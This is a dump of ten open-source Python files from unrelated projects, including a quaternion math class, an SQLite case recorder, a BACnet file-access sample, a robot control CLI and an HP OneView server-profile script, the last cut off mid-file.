path
stringlengths 23
146
| source_code
stringlengths 0
261k
|
|---|---|
data/adamlwgriffiths/Pyrr/pyrr/objects/quaternion.py
|
"""Represents a Quaternion rotation.
The Quaternion class provides a number of convenient functions and
conversions.
::
import numpy as np
from pyrr import Quaternion, Matrix33, Matrix44, Vector3, Vector4
q = Quaternion()
q = Quaternion.from_x_rotation(np.pi / 2.0)
q = Quaternion.from_matrix(Matrix33.identity())
q = Quaternion.from_matrix(Matrix44.identity())
q = Quaternion(Quaternion())
q = Quaternion(Matrix33.identity())
q = Quaternion(Matrix44.identity())
q1 = Quaternion.from_y_rotation(np.pi / 2.0)
q2 = Quaternion.from_x_rotation(np.pi / 2.0)
q3 = q1 * q2
m33 = q3.matrix33
m44 = q3.matrix44
q4 = Quaternion(m44)
q = Quaternion() * Matrix33.identity()
q = Quaternion() * Matrix44.identity()
v3 = Quaternion() * Vector3()
v4 = Quaternion() * Vector4()
q = Quaternion.from_x_rotation(np.pi / 2.0)
v = q * Vector3([1.,1.,1.])
original = ~q * v
assert np.allclose(original, v)
dot = Quaternion() | Quaternion.from_x_rotation(np.pi / 2.0)
"""
from __future__ import absolute_import
import numpy as np
from multipledispatch import dispatch
from .base import BaseObject, BaseQuaternion, BaseMatrix, BaseVector, NpProxy
from .. import quaternion
class Quaternion(BaseQuaternion):
_module = quaternion
_shape = (4,)
x = NpProxy(0)
y = NpProxy(1)
z = NpProxy(2)
w = NpProxy(3)
xy = NpProxy([0,1])
xyz = NpProxy([0,1,2])
xyzw = NpProxy([0,1,2,3])
xz = NpProxy([0,2])
xzw = NpProxy([0,2,3])
xyw = NpProxy([0,1,3])
xw = NpProxy([0,3])
@classmethod
def from_x_rotation(cls, theta, dtype=None):
"""Creates a new Quaternion with a rotation around the X-axis.
"""
return cls(quaternion.create_from_x_rotation(theta, dtype))
@classmethod
def from_y_rotation(cls, theta, dtype=None):
"""Creates a new Quaternion with a rotation around the Y-axis.
"""
return cls(quaternion.create_from_y_rotation(theta, dtype))
@classmethod
def from_z_rotation(cls, theta, dtype=None):
"""Creates a new Quaternion with a rotation around the Z-axis.
"""
return cls(quaternion.create_from_z_rotation(theta, dtype))
@classmethod
def from_axis_rotation(cls, axis, theta, dtype=None):
"""Creates a new Quaternion with a rotation around the specified axis.
"""
return cls(quaternion.create_from_axis_rotation(axis, theta, dtype))
@classmethod
def from_matrix(cls, matrix, dtype=None):
"""Creates a Quaternion from the specified Matrix (Matrix33 or Matrix44).
"""
return cls(quaternion.create_from_matrix(matrix, dtype))
@classmethod
def from_eulers(cls, eulers, dtype=None):
"""Creates a Quaternion from the specified Euler angles.
"""
return cls(quaternion.create_from_eulers(eulers, dtype))
@classmethod
def from_inverse_of_eulers(cls, eulers, dtype=None):
"""Creates a Quaternion from the inverse of the specified Euler angles.
"""
return cls(quaternion.create_from_inverse_of_eulers(eulers, dtype))
def __new__(cls, value=None, dtype=None):
if value is not None:
obj = value
if not isinstance(value, np.ndarray):
obj = np.array(value, dtype=dtype)
if obj.shape in ((4,4,), (3,3,)) or isinstance(obj, (Matrix33, Matrix44)):
obj = quaternion.create_from_matrix(obj, dtype=dtype)
else:
obj = quaternion.create(dtype=dtype)
obj = obj.view(cls)
return super(Quaternion, cls).__new__(cls, obj)
@dispatch(BaseObject)
def __add__(self, other):
self._unsupported_type('add', other)
@dispatch(BaseObject)
def __sub__(self, other):
self._unsupported_type('subtract', other)
@dispatch(BaseObject)
def __mul__(self, other):
self._unsupported_type('multiply', other)
@dispatch(BaseObject)
def __truediv__(self, other):
self._unsupported_type('divide', other)
@dispatch(BaseObject)
def __div__(self, other):
self._unsupported_type('divide', other)
@dispatch((BaseQuaternion, np.ndarray, list))
def __sub__(self, other):
return Quaternion(super(Quaternion, self).__sub__(other))
@dispatch((BaseQuaternion, list))
def __mul__(self, other):
return self.cross(other)
@dispatch((BaseQuaternion, list))
def __or__(self, other):
return self.dot(other)
def __invert__(self):
return self.conjugate
@dispatch(BaseMatrix)
def __mul__(self, other):
return self * Quaternion(other)
@dispatch(BaseVector)
def __mul__(self, other):
return type(other)(quaternion.apply_to_vector(self, other))
@property
def length(self):
"""Returns the length of this Quaternion.
"""
return quaternion.length(self)
def normalise(self):
"""Normalises this Quaternion in-place.
"""
self[:] = quaternion.normalise(self)
@property
def normalised(self):
"""Returns a normalised version of this Quaternion as a new Quaternion.
"""
return Quaternion(quaternion.normalise(self))
@property
def angle(self):
"""Returns the angle around the axis of rotation of this Quaternion as a float.
"""
return quaternion.rotation_angle(self)
@property
def axis(self):
"""Returns the axis of rotation of this Quaternion as a Vector3.
"""
return Vector3(quaternion.rotation_axis(self))
def cross(self, other):
"""Returns the cross of this Quaternion and another.
This is the equivalent of combining Quaternion rotations (like Matrix multiplication).
"""
return Quaternion(quaternion.cross(self, other))
def dot(self, other):
"""Returns the dot of this Quaternion and another.
"""
return quaternion.dot(self, other)
@property
def conjugate(self):
"""Returns the conjugate of this Quaternion.
This is a Quaternion with the opposite rotation.
"""
return Quaternion(quaternion.conjugate(self))
@property
def inverse(self):
"""Returns the inverse of this quaternion.
"""
return Quaternion(quaternion.inverse(self))
def power(self, exponent):
"""Returns a new Quaternion representing this Quaternion to the power of the exponent.
"""
return Quaternion(quaternion.power(self, exponent))
@property
def negative(self):
"""Returns the negative of the Quaternion.
"""
return Quaternion(quaternion.negate(self))
@property
def is_identity(self):
"""Returns True if the Quaternion has no rotation (0.,0.,0.,1.).
"""
return quaternion.is_identity(self)
@property
def matrix44(self):
"""Returns a Matrix44 representation of this Quaternion.
"""
return Matrix44.from_quaternion(self)
@property
def matrix33(self):
"""Returns a Matrix33 representation of this Quaternion.
"""
return Matrix33.from_quaternion(self)
from .vector3 import Vector3
from .matrix33 import Matrix33
from .matrix44 import Matrix44
|
data/OpenMDAO/OpenMDAO/openmdao/recorders/sqlite_recorder.py
|
"""Class definition for SqliteRecorder, which provides dictionary backed by SQLite"""
from collections import OrderedDict
from sqlitedict import SqliteDict
from openmdao.recorders.base_recorder import BaseRecorder
from openmdao.util.record_util import format_iteration_coordinate
from openmdao.core.mpi_wrap import MPI
class SqliteRecorder(BaseRecorder):
""" Recorder that saves cases in an SQLite dictionary.
Args
----
sqlite_dict_args : dict
Dictionary lf any additional arguments for the SQL db.
Options
-------
options['record_metadata'] : bool(True)
Tells recorder whether to record variable attribute metadata.
options['record_unknowns'] : bool(True)
Tells recorder whether to record the unknowns vector.
options['record_params'] : bool(False)
Tells recorder whether to record the params vector.
options['record_resids'] : bool(False)
Tells recorder whether to record the ressiduals vector.
options['record_derivs'] : bool(True)
Tells recorder whether to record derivatives that are requested by a `Driver`.
options['includes'] : list of strings
Patterns for variables to include in recording.
options['excludes'] : list of strings
Patterns for variables to exclude in recording (processed after includes).
"""
def __init__(self, out, **sqlite_dict_args):
super(SqliteRecorder, self).__init__()
if MPI and MPI.COMM_WORLD.rank > 0 :
self._open_close_sqlitedict = False
else:
self._open_close_sqlitedict = True
if self._open_close_sqlitedict:
sqlite_dict_args.setdefault('autocommit', True)
sqlite_dict_args.setdefault('tablename', 'openmdao')
self.out = SqliteDict(filename=out, flag='n', **sqlite_dict_args)
else:
self.out = None
def record_metadata(self, group):
"""Stores the metadata of the given group in a sqlite file using
the variable name for the key.
Args
----
group : `System`
`System` containing vectors
"""
params = group.params.iteritems()
resids = group.resids.iteritems()
unknowns = group.unknowns.iteritems()
data = OrderedDict([('Parameters', dict(params)),
('Unknowns', dict(unknowns)),
])
self.out['metadata'] = data
def record_iteration(self, params, unknowns, resids, metadata):
"""
Stores the provided data in the sqlite file using the iteration
coordinate for the key.
Args
----
params : dict
Dictionary containing parameters. (p)
unknowns : dict
Dictionary containing outputs and states. (u)
resids : dict
Dictionary containing residuals. (r)
metadata : dict, optional
Dictionary containing execution metadata (e.g. iteration coordinate).
"""
data = OrderedDict()
iteration_coordinate = metadata['coord']
timestamp = metadata['timestamp']
group_name = format_iteration_coordinate(iteration_coordinate)
data['timestamp'] = timestamp
data['success'] = metadata['success']
data['msg'] = metadata['msg']
if self.options['record_params']:
data['Parameters'] = self._filter_vector(params, 'p', iteration_coordinate)
if self.options['record_unknowns']:
data['Unknowns'] = self._filter_vector(unknowns, 'u', iteration_coordinate)
if self.options['record_resids']:
data['Residuals'] = self._filter_vector(resids, 'r', iteration_coordinate)
self.out[group_name] = data
def record_derivatives(self, derivs, metadata):
"""Writes the derivatives that were calculated for the driver.
Args
----
derivs : dict
Dictionary containing derivatives
metadata : dict, optional
Dictionary containing execution metadata (e.g. iteration coordinate).
"""
data = OrderedDict()
iteration_coordinate = metadata['coord']
timestamp = metadata['timestamp']
group_name = format_iteration_coordinate(iteration_coordinate)
group_name = '%s/derivs' % group_name
data['timestamp'] = timestamp
data['success'] = metadata['success']
data['msg'] = metadata['msg']
data['Derivatives'] = derivs
self.out[group_name] = data
def close(self):
"""Closes `out`"""
if self._open_close_sqlitedict:
if self.out is not None:
self.out.close()
self.out = None
|
data/Parsely/streamparse/examples/redis/src/spouts.py
|
from itertools import cycle
from streamparse import Spout
class WordSpout(Spout):
outputs = ['word']
def initialize(self, stormconf, context):
self.words = cycle(['dog', 'cat', 'zebra', 'elephant'])
def next_tuple(self):
word = next(self.words)
self.emit([word])
|
data/Netflix/brutal/brutal/core/constants.py
|
OFF = 0
ON = 1
DISCONNECTED = 20
CONNECTED = 30
DEFAULT_EVENT_VERSION = 1
DEFAULT_ACTION_VERSION = 1
|
data/ReactiveX/RxPY/rx/disposables/singleassignmentdisposable.py
|
from .booleandisposable import BooleanDisposable
class SingleAssignmentDisposable(BooleanDisposable):
"""Represents a disposable resource which only allows a single assignment
of its underlying disposable resource. If an underlying disposable resource
has already been set, future attempts to set the underlying disposable
resource will throw an Error."""
def __init__(self):
super(SingleAssignmentDisposable, self).__init__(True)
|
data/Julian/Condent/setup.py
|
from distutils.core import setup
from condent import __version__
with open("README.rst") as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.1",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
]
setup(
name="condent",
version=__version__,
py_modules=["condent"],
scripts=["bin/condent"],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A simple reindent for containers that reindents as I like it",
license="MIT/X",
long_description=long_description,
url="http://github.com/Julian/condent",
)
|
data/JoelBender/bacpypes/samples/ReadWriteFile.py
|
"""
ReadWriteFile.py
This application presents a 'console' prompt to the user asking for commands.
The 'readrecord' and 'writerecord' commands are used with record oriented files,
and the 'readstream' and 'writestream' commands are used with stream oriented
files.
"""
import sys
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd
from bacpypes.core import run
from bacpypes.pdu import Address
from bacpypes.app import LocalDeviceObject, BIPSimpleApplication
from bacpypes.apdu import Error, AbortPDU, \
AtomicReadFileRequest, \
AtomicReadFileRequestAccessMethodChoice, \
AtomicReadFileRequestAccessMethodChoiceRecordAccess, \
AtomicReadFileRequestAccessMethodChoiceStreamAccess, \
AtomicReadFileACK, \
AtomicWriteFileRequest, \
AtomicWriteFileRequestAccessMethodChoice, \
AtomicWriteFileRequestAccessMethodChoiceRecordAccess, \
AtomicWriteFileRequestAccessMethodChoiceStreamAccess, \
AtomicWriteFileACK
from bacpypes.basetypes import ServicesSupported
_debug = 0
_log = ModuleLogger(globals())
this_application = None
@bacpypes_debugging
class TestApplication(BIPSimpleApplication):
def request(self, apdu):
if _debug: TestApplication._debug("request %r", apdu)
self._request = apdu
BIPSimpleApplication.request(self, apdu)
def confirmation(self, apdu):
if _debug: TestApplication._debug("confirmation %r", apdu)
if isinstance(apdu, Error):
sys.stdout.write("error: %s\n" % (apdu.errorCode,))
sys.stdout.flush()
elif isinstance(apdu, AbortPDU):
apdu.debug_contents()
elif (isinstance(self._request, AtomicReadFileRequest)) and (isinstance(apdu, AtomicReadFileACK)):
if apdu.accessMethod.recordAccess:
value = apdu.accessMethod.recordAccess.fileRecordData
elif apdu.accessMethod.streamAccess:
value = apdu.accessMethod.streamAccess.fileData
TestApplication._debug(" - value: %r", value)
sys.stdout.write(repr(value) + '\n')
sys.stdout.flush()
elif (isinstance(self._request, AtomicWriteFileRequest)) and (isinstance(apdu, AtomicWriteFileACK)):
if apdu.fileStartPosition is not None:
value = apdu.fileStartPosition
elif apdu.fileStartRecord is not None:
value = apdu.fileStartRecord
TestApplication._debug(" - value: %r", value)
sys.stdout.write(repr(value) + '\n')
sys.stdout.flush()
@bacpypes_debugging
class TestConsoleCmd(ConsoleCmd):
def do_readrecord(self, args):
"""readrecord <addr> <inst> <start> <count>"""
args = args.split()
if _debug: TestConsoleCmd._debug("do_readrecord %r", args)
try:
addr, obj_inst, start_record, record_count = args
obj_type = 'file'
obj_inst = int(obj_inst)
start_record = int(start_record)
record_count = int(record_count)
request = AtomicReadFileRequest(
fileIdentifier=(obj_type, obj_inst),
accessMethod=AtomicReadFileRequestAccessMethodChoice(
recordAccess=AtomicReadFileRequestAccessMethodChoiceRecordAccess(
fileStartRecord=start_record,
requestedRecordCount=record_count,
),
),
)
request.pduDestination = Address(addr)
if _debug: TestConsoleCmd._debug(" - request: %r", request)
this_application.request(request)
except Exception, e:
TestConsoleCmd._exception("exception: %r", e)
def do_readstream(self, args):
"""readstream <addr> <inst> <start> <count>"""
args = args.split()
if _debug: TestConsoleCmd._debug("do_readstream %r", args)
try:
addr, obj_inst, start_position, octet_count = args
obj_type = 'file'
obj_inst = int(obj_inst)
start_position = int(start_position)
octet_count = int(octet_count)
request = AtomicReadFileRequest(
fileIdentifier=(obj_type, obj_inst),
accessMethod=AtomicReadFileRequestAccessMethodChoice(
streamAccess=AtomicReadFileRequestAccessMethodChoiceStreamAccess(
fileStartPosition=start_position,
requestedOctetCount=octet_count,
),
),
)
request.pduDestination = Address(addr)
if _debug: TestConsoleCmd._debug(" - request: %r", request)
this_application.request(request)
except Exception, e:
TestConsoleCmd._exception("exception: %r", e)
def do_writerecord(self, args):
"""writerecord <addr> <inst> <start> <count> [ <data> ... ]"""
args = args.split()
if _debug: TestConsoleCmd._debug("do_writerecord %r", args)
try:
addr, obj_inst, start_record, record_count = args[0:4]
obj_type = 'file'
obj_inst = int(obj_inst)
start_record = int(start_record)
record_count = int(record_count)
record_data = list(args[4:])
request = AtomicWriteFileRequest(
fileIdentifier=(obj_type, obj_inst),
accessMethod=AtomicWriteFileRequestAccessMethodChoice(
recordAccess=AtomicWriteFileRequestAccessMethodChoiceRecordAccess(
fileStartRecord=start_record,
recordCount=record_count,
fileRecordData=record_data,
),
),
)
request.pduDestination = Address(addr)
if _debug: TestConsoleCmd._debug(" - request: %r", request)
this_application.request(request)
except Exception, e:
TestConsoleCmd._exception("exception: %r", e)
def do_writestream(self, args):
"""writestream <addr> <inst> <start> <data>"""
args = args.split()
if _debug: TestConsoleCmd._debug("do_writestream %r", args)
try:
addr, obj_inst, start_position, data = args
obj_type = 'file'
obj_inst = int(obj_inst)
start_position = int(start_position)
request = AtomicWriteFileRequest(
fileIdentifier=(obj_type, obj_inst),
accessMethod=AtomicWriteFileRequestAccessMethodChoice(
streamAccess=AtomicWriteFileRequestAccessMethodChoiceStreamAccess(
fileStartPosition=start_position,
fileData=data,
),
),
)
request.pduDestination = Address(addr)
if _debug: TestConsoleCmd._debug(" - request: %r", request)
this_application.request(request)
except Exception, e:
TestConsoleCmd._exception("exception: %r", e)
try:
args = ConfigArgumentParser(description=__doc__).parse_args()
if _debug: _log.debug("initialization")
if _debug: _log.debug(" - args: %r", args)
this_device = LocalDeviceObject(
objectName=args.ini.objectname,
objectIdentifier=int(args.ini.objectidentifier),
maxApduLengthAccepted=int(args.ini.maxapdulengthaccepted),
segmentationSupported=args.ini.segmentationsupported,
vendorIdentifier=int(args.ini.vendoridentifier),
)
this_application = TestApplication(this_device, args.ini.address)
services_supported = this_application.get_services_supported()
if _debug: _log.debug(" - services_supported: %r", services_supported)
this_device.protocolServicesSupported = services_supported.value
this_console = TestConsoleCmd()
_log.debug("running")
run()
except Exception, e:
_log.exception("an error has occurred: %s", e)
finally:
_log.debug("finally")
|
data/IEEERobotics/bot/bot/interface/cli.py
|
"""Send commands to the bot through a CLI interface."""
import cmd
import sys
import os
import bot.client.ctrl_client as ctrl_client_mod
import bot.client.sub_client as sub_client_mod
class CLI(cmd.Cmd):
"""CLI for interacting with the bot.
Note that the architecture is that interfaces, like the Command
Line *Interface*, are used by agents like humans to interact
with the bot. For interfaces to communicate with the bot, they
own clients (like CtrlClient and SubClient), which know how to
speak ZMQ to the servers (like CtrlServer and PubServer) running on
the bot. Servers own systems (like gunner and driver) and known how
to fire commands off to those systems and/or share data about their
state.
"""
prompt = "bot$ "
def __init__(self, ctrl_addr, sub_addr):
"""Build CtrlClient and SubClient, for connections to servers.
We're not using a logger or config here to reduce dependencies.
CtrlClient is used for sending commands to the bot. Some commands,
like `ping`, are answered by CtrlClient directly. Others, like
`fire`, are actually exported methods that CtrlClient exposes
via the API. Those calls are passed to the relevant method of a
system owned by CtrlClient.
SubClient manages subscriptions to topics published by PubServer
on the bot. Topics can be subscribed to via `sub_add` and removed
via `sub_del`. To print the data being published, use `sub`.
Only topics that are actually subscribed to by one or more clients
will be published by PubServer, saving bot resources. Note that
PubServer isn't spawned by default when CtrlServer is created.
To spawn it (in its own thread), issue `ctrl spawn_pub_server`.
:param ctrl_addr: Address of control server to connect to via ZMQ.
:type ctrl_addr: string
:param sub_addr: Address of PUB/SUB server to connect to via ZMQ.
:type sub_addr: string
"""
cmd.Cmd.__init__(self)
try:
self.ctrl_client = ctrl_client_mod.CtrlClient(ctrl_addr)
except Exception, e:
print "Couldn't build CtrlClient addr:{} e:{}".format(ctrl_addr, e)
sys.exit(-1)
try:
self.sub_client = sub_client_mod.SubClient(sub_addr)
except Exception, e:
print "SubClient error sub_addr:{}, error:{}".format(sub_addr, e)
sys.exit(-1)
def default(self, raw_args):
"""Parses API commands (ex `ctrl echo msg:7`) into calls to CtrlServer.
API commands are those given by the `list` command. Note that a
heuristic is used to convert params (like "7" in the example above)
into the types expected by the method that will be called and passed
that param by CtrlServer. It has held up well so far.
:param raw_args: Command from user to be parsed/passed to CtrlServer.
:type raw_args: string
"""
obj_name, _, rest = raw_args.partition(" ")
if obj_name in self.ctrl_client.objects:
method_name, _, params = rest.partition(" ")
if method_name in self.ctrl_client.objects[obj_name]:
try:
param_dict = {}
for param in params.split():
key, value = param.split(":")
try:
if "." in value:
value = float(value)
else:
value = int(value)
except ValueError:
if value == "True":
value = True
elif value == "False":
value = False
elif value.startswith("'") and value.endswith("'"):
value = value[1:-1]
param_dict[key] = value
except IndexError:
print "Bad parameter list"
return
except ValueError:
print "Bad parameter value"
return
result = self.ctrl_client.call(
obj_name, method_name, param_dict)
print "-->", result
else:
print "Unknown API method:", method_name
else:
print "Unknown command:", obj_name
def completenames(self, text, *ignored):
"""Handles tab-completion of object names exported by the API.
Object names, like those returned by `list` (driver, gun...),
aren't known to Cmd.completenames. We extend it here to deal
with tab-completing them.
:param text: Text the user has type so far, to be tab-completed.
:type text: string
:param *ignored: Not documented in Cmd.completenames. No idea.
:type *ignored: Not documented in Cmd.completenames. Dict?
"""
cmd_match_names = cmd.Cmd.completenames(self, text, *ignored)
obj_names = self.ctrl_client.objects.keys()
api_match_names = [x for x in obj_names if x.startswith(text)]
return cmd_match_names + api_match_names
def completedefault(self, text, line, begidx, endidx):
"""Handles tab-completion of method names exported by API.
The matching of the first term (the object name exported by the API)
is done separately, using the results of copmletenames().
:param text: Part of method name (second arg) typed so far by user.
:type text: string
:param line: Entire line typed so far by user.
:type line: string
:param begidx: Index into "line" where "text" begins.
:type begidx: int
:param endidx: Index into "line" where "text" ends.
:type endidx: int
:returns: List of exported API methods that match text given by user.
"""
obj, _, rest = line.partition(" ")
if obj in self.ctrl_client.objects:
method, _, params = rest.strip().partition(" ")
if method == text:
method_names = self.ctrl_client.objects[obj]
match_names = [x for x in method_names if x.startswith(text)]
return match_names
def do_list(self, raw_args):
"""Provide a list of bot API objects and their methods.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
print
print "Available bot objects and methods"
print
for obj_name, methods in sorted(self.ctrl_client.objects.items()):
print "{}:".format(obj_name)
for method in methods:
print " - {}".format(method)
print
def help_list(self):
"""Provide help message for list command."""
print "list"
print "\tList on-bot objects and methods exposed by the API."
def do_ping(self, raw_args):
"""Ping the control server on the bot.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
reply_time = self.ctrl_client.ping()
print "CtrlServer response time: {}ms".format(reply_time)
def help_ping(self):
"""Provide help message for ping command."""
print "ping"
print "\tPing the control server on the bot."
def do_sub_add(self, raw_args):
"""Subscribe to a published topic.
Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
subscribed to by any client are not published (done automatically
at the server).
:param raw_args: Commands string with topic name to add.
:type raw_args: string
"""
try:
topic = raw_args.split()[0]
except (ValueError, IndexError):
print "Invalid command, see help [cmd]."
return
self.sub_client.add_topic(topic)
def help_sub_add(self):
"""Provide help message for sub_add command."""
print "sub_add <topic>"
print "\tSubscribe to a published topic."
def do_sub_del(self, raw_args):
"""Unsubscribe from a published topic.
Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
subscribed to by any client are not published (done automatically
at the server).
:param raw_args: Commands string with topic name to unsubscribe from.
:type raw_args: string
"""
try:
topic = raw_args.split()[0]
except (ValueError, IndexError):
print "Invalid command, see help [cmd]."
return
self.sub_client.del_topic(topic)
def help_sub_del(self):
"""Provide help message for sub_del command."""
print "sub_del <topic>"
print "\tUnsubscribe from a published topic."
def do_sub(self, raw_args):
"""Print topics subscribed to via SubClient.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
self.sub_client.print_msgs()
def help_sub(self):
"""Provide help message for sub command."""
print "sub"
print "\tPrint messages subscribed to. Ctrl+c to exit."
def do_stop(self, raw_args):
"""Stop all drive and gun motors, put turret in save state.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
self.ctrl_client.stop_full()
def help_stop(self):
"""Provide help message for stop command."""
print "stop"
print "\tStop all drive and gun motors, put turret in safe state."
def do_kill(self, raw_args):
"""Send message to CtrlServer, asking it to exit.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
self.ctrl_client.exit_server()
def help_kill(self):
"""Provide help message for kill command."""
print "kill"
print "\tAsk the CtrlServer to exit."
def do_die(self, raw_args):
"""Disconnect from servers and close CLI.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
print "Disconnecting..."
self.ctrl_client.clean_up()
self.sub_client.clean_up()
print "Bye!"
return True
def help_die(self):
"""Provide help message for die command."""
print "die"
print "\tDisconnect from servers and close CLI."
def do_shell(self, cmd):
"""Allows normal shell commands to be run.
:param cmd: Everything after "shell" or "!", to be passed to shell.
:type cmd: string
"""
os.system(cmd)
def help_shell(self):
"""Provide help message for shell command."""
print "!|shell [command]"
print "\tSend command to underlying system shell (like Bash)."
def do_EOF(self, raw_args):
"""Cleans up when ctrl+d is used to exit client.
:param raw_args: Mandatory param for Cmd handler, not used.
:type raw_args: string
"""
print "Disconnecting..."
self.ctrl_client.clean_up()
self.sub_client.clean_up()
print "Bye!"
return True
def help_EOF(self):
"""Provide help message for EOF (ctrl+d) command."""
print "ctrl+d"
print "\tDisconnect from servers and close CLI with ctrl+d."
def help_help(self):
"""Provide help message for help command."""
print "help [command]"
print "\tProvide help on given command. If no argument, list commands."
if __name__ == '__main__':
if len(sys.argv) == 1:
print "No ctrl_addr or sub_addr given, using tcp://localhost:60000,1"
CLI("tcp://localhost:60000", "tcp://localhost:60001").cmdloop()
elif len(sys.argv) == 3:
ctrl_addr = sys.argv[1]
sub_addr = sys.argv[2]
CLI(ctrl_addr, sub_addr).cmdloop()
else:
print "Error: Expected `./cli.py [ctrl_addr sub_addr]`"
|
data/boto/boto/tests/integration/iam/__init__.py
| |
data/ODM2/ODMToolsPython/odmtools/controller/frmAbout.py
|
__author__ = 'Stephanie'
import wx
from wx import AboutBox, AboutDialogInfo, ClientDC
from wx.lib.wordwrap import wordwrap
from odmtools.meta import data
class frmAbout(wx.Dialog):
def __init__(self, parent):
self.parent = parent
info = AboutDialogInfo()
info.Name = data.app_name
info.Version = data.version
info.Copyright = data.copyright
info.Description = wordwrap(data.description, 350, ClientDC(parent))
info.WebSite = data.website
info.Developers = data.developers
info.License = wordwrap(data.license, 500, ClientDC(parent))
AboutBox(info)
|
data/MarkusH/django-dynamic-forms/dynamic_forms/migrations/0004_formmodel_recipient_email.py
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dynamic_forms', '0003_auto_20140916_1433'),
]
operations = [
migrations.AddField(
model_name='formmodel',
name='recipient_email',
field=models.EmailField(help_text='Email address to send form data.', max_length=75, null=True, verbose_name='Recipient email', blank=True),
preserve_default=True,
),
]
|
data/HewlettPackard/python-hpOneView/examples/scripts/define-profile-template.py
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from builtins import range
from future import standard_library
standard_library.install_aliases()
import sys
PYTHON_VERSION = sys.version_info[:3]
PY2 = (PYTHON_VERSION[0] == 2)
if PY2:
if PYTHON_VERSION < (2, 7, 9):
raise Exception('Must use Python 2.7.9 or later')
elif PYTHON_VERSION < (3, 4):
raise Exception('Must use Python 3.4 or later')
import hpOneView as hpov
from pprint import pprint
import json
from hpOneView.common import uri
import hpOneView.profile as profile
def acceptEULA(con):
con.get_eula_status()
try:
if con.get_eula_status() is True:
print('EULA display needed')
con.set_eula('no')
except Exception as e:
print('EXCEPTION:')
print(e)
def login(con, credential):
try:
con.login(credential)
except:
print('Login failed')
def get_eg_uri_from_arg(srv, name):
if srv and name:
if name.startswith('/rest') and uri['enclosureGroups'] in name:
return name
else:
egs = srv.get_enclosure_groups()
for eg in egs:
if eg['name'] == name:
return eg['uri']
return None
def get_sht_from_arg(srv, name):
if srv and name:
if name.startswith('/rest') and uri['server-hardware-types'] in name:
return name
else:
shts = srv.get_server_hardware_types()
for sht in shts:
if sht['name'] == name:
return sht
return None
def define_profile_template(
srv,
name,
desc,
sp_desc,
server_hwt,
enc_group,
affinity,
hide_flexnics,
conn_list,
fw_settings,
boot,
bootmode):
if conn_list:
conn = json.loads(open(conn_list).read())
else:
conn = []
profile_template = srv.create_server_profile_template(
name=name,
description=desc,
serverProfileDescription=sp_desc,
serverHardwareTypeUri=server_hwt,
enclosureGroupUri=enc_group,
affinity=affinity,
hideUnusedFlexNics=hide_flexnics,
profileConnectionV4=conn,
firmwareSettingsV3=fw_settings,
bootSettings=boot,
bootModeSetting=bootmode)
if 'serialNumberType' in profile_template:
print('\n\nName: ', profile_template['name'])
print('Type: ', profile_template['type'])
print('Description: ', profile_template['description'])
print('serialNumberType: ', profile_template['serialNumberType'])
print('Connections:')
for connection in profile_template['connections']:
print(' name: ', connection['name'])
print(' functionType: ', connection['functionType'])
print(' networkUri: ', connection['networkUri'])
print('Firmware:')
print(' manageFirmware: ', profile_template['firmware']['manageFirmware'])
print(' forceInstallFirmware: ', profile_template['firmware']['forceInstallFirmware'])
print(' firmwareBaselineUri: ', profile_template['firmware']['firmwareBaselineUri'])
print('Bios:')
print(' manageBios: ', profile_template['bios']['manageBios'])
print(' overriddenSettings: ', profile_template['bios']['overriddenSettings'])
print('Boot:')
print(' manageBoot: ', profile_template['boot']['manageBoot'])
print(' order: ', profile_template['boot']['order'], '\n')
else:
pprint(profile_template)
def main():
parser = argparse.ArgumentParser(add_help=True,
formatter_class=argparse.RawTextHelpFormatter,
description='''
Define a server profile template''')
parser.add_argument('-a', dest='host', required=True,
help='''
HP OneView Appliance hostname or IP address''')
parser.add_argument('-u', dest='user', required=False,
default='Administrator',
help='''
HP OneView Username''')
parser.add_argument('-p', dest='passwd', required=True,
help='''
HP OneView Password''')
parser.add_argument('-c', dest='cert', required=False,
help='''
Trusted SSL Certificate Bundle in PEM (Base64 Encoded DER) Format''')
parser.add_argument('-y', dest='proxy', required=False,
help='''
Proxy (host:port format''')
parser.add_argument('-n', dest='name',
required=True,
help='''
Name of the profile template''')
parser.add_argument('-d', dest='desc',
required=False,
help='''
Description for the server profile template''')
parser.add_argument('-spd', dest='sp_desc',
required=False,
help='''
Server profile description''')
parser.add_argument('-sht', dest='server_hwt', required=True,
help='''
Server hardware type is required for defining an unassigned profile. Note
the Server Hardware Type must be present in the HP OneView appliance
before it can be used. For example, a single server with the specific server
hardware type must have been added to OneView for that hardware type to
be used. The example script get-server-hardware-types.py with the -l
argument can be used to get a list of server hardware types that have
been imported into the OneView appliance''')
parser.add_argument('-eg', dest='enc_group', required=True,
help='''
Identifies the enclosure group for which the Server Profile Template
was designed. The enclosureGroupUri is determined when the profile
template is created and cannot be modified
''')
parser.add_argument('-af', dest='affinity',
required=False, choices=['Bay', 'BayAndServer'],
default='Bay',
help='''
This identifies the behavior of the server profile when the server
hardware is removed or replaced.
. Bay: This profile remains with the device bay when the server
hardware is removed or replaced.
. BayAndServer This profile is pinned to both the device bay and
specific server hardware.''')
parser.add_argument('-hn', dest='hide_flexnics',
required=False, choices=['true', 'false'],
help='''
This setting controls the enumeration of physical functions that do not
correspond to connections in a profile. Using this flag will SHOW unused
